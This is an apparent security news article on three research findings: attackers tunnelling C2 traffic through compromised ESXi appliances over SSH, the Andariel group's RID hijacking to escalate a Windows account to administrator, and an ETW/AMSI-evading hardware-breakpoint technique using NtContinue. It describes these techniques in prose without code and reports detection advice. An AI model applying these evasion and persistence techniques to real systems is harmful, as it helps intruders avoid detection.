Cybersecurity researchers have found that ransomware attacks targeting ESXi systems are also leveraging the access to repurpose the appliances as a conduit to tunnel traffic to command-and-control (C2) infrastructure and stay under the radar.
“ESXi appliances, which are unmonitored, are increasingly exploited as a persistence mechanism and gateway to access corporate networks widely,” Sygnia researchers Zhongyuan Hau (Aaron) and Ren Jie Yow said in a report published last week.
“Threat actors use these platforms by adopting ‘living-off-the-land’ techniques and using native tools like SSH to establish a SOCKS tunnel between their C2 servers and the compromised environment.”
In doing so, the idea is to blend into legitimate traffic and establish long-term persistence on the compromised network with little-to-no detection by security controls.
The cybersecurity company said in many of its incident response engagements, ESXi systems were compromised either by using admin credentials or leveraging a known security vulnerability to get around authentication protections. Subsequently, the threat actors have been found to set up a tunnel using SSH or other tools with equivalent functionality.
“Since ESXi appliances are resilient and rarely shutdown unexpectedly, this tunneling serves as a semi-persistent backdoor within the network,” the researchers noted.
Sygnia has also highlighted the challenges in monitoring ESXi logs, emphasizing the need for configuring log forwarding to capture all relevant events in one place for forensic investigations.
To detect attacks that involve the use of SSH tunneling on ESXi appliances, organizations have been recommended to review the below four log files –
- /var/log/shell.log (ESXi shell activity log)
- /var/log/hostd.log (Host agent log)
- /var/log/auth.log (authentication log)
- /var/log/vobd.log (VMware observer daemon log)
Andariel Employs RID Hijacking
The development comes as the AhnLab Security Intelligence Center (ASEC) detailed an attack mounted by the North Korea-linked Andariel group that involves the use of a technique known as Relative Identifier (RID) hijacking to covertly modify the Windows Registry to assign a guest or low privileged account administrative permissions during the next login.
The persistence method is sneaky in that it takes advantage of the fact that regular accounts are not subjected to the same level of surveillance as the administrator account, thereby allowing threat actors to perform malicious actions while remaining undetected.
However, in order to perform RID hijacking, the adversary must have already compromised a machine and gained administrative or SYSTEM privileges, as it requires changing the RID value of the standard account to that of the Administrator account (500).
In the attack chain documented by ASEC, the threat actor is said to have created a new account and assigned it administrator privileges using this approach, after obtaining SYSTEM privileges themselves using privilege escalation tools such as PsExec and JuicyPotato.
“The threat actor then added the created account to the Remote Desktop Users group and Administrators group using the ‘net localgroup’ command,” the company said. “When an account is added to the Remote Desktop Users group, the account can be accessed by using RDP.”
“Once the RID value has been changed, the Windows OS recognizes the account created by the threat actor as having the same privileges as the target account, enabling privilege escalation.”
New Technique for EDR Evasion
In related news, it has also been discovered that an approach based on hardware breakpoints could be leveraged to bypass Event Tracing for Windows (ETW) detections, which provides a mechanism to log events raised by user-mode applications and kernel-mode drivers.
This entails using a native Windows function called NtContinue, instead of SetThreadContext, to set debug registers and avoid triggering ETW logging and events that are parsed by EDRs to flag suspicious activity, thereby getting around telemetry that relies on SetThreadContext.
“By leveraging hardware breakpoints at the CPU level, attackers can hook functions and manipulate telemetry in userland without direct kernel patching — challenging traditional defenses,” Praetorian researcher Rad Kawar said.
“This matters because it highlights a technique adversaries can use to evade and maintain stealth while implementing “patchless” hooks that prevent AMSI scanning and avoid ETW logging.”
